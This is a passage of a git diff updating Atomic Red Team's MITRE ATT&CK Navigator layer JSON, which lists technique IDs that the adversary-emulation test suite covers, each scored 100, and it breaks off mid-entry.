techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 106fd708..08f59b92 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T12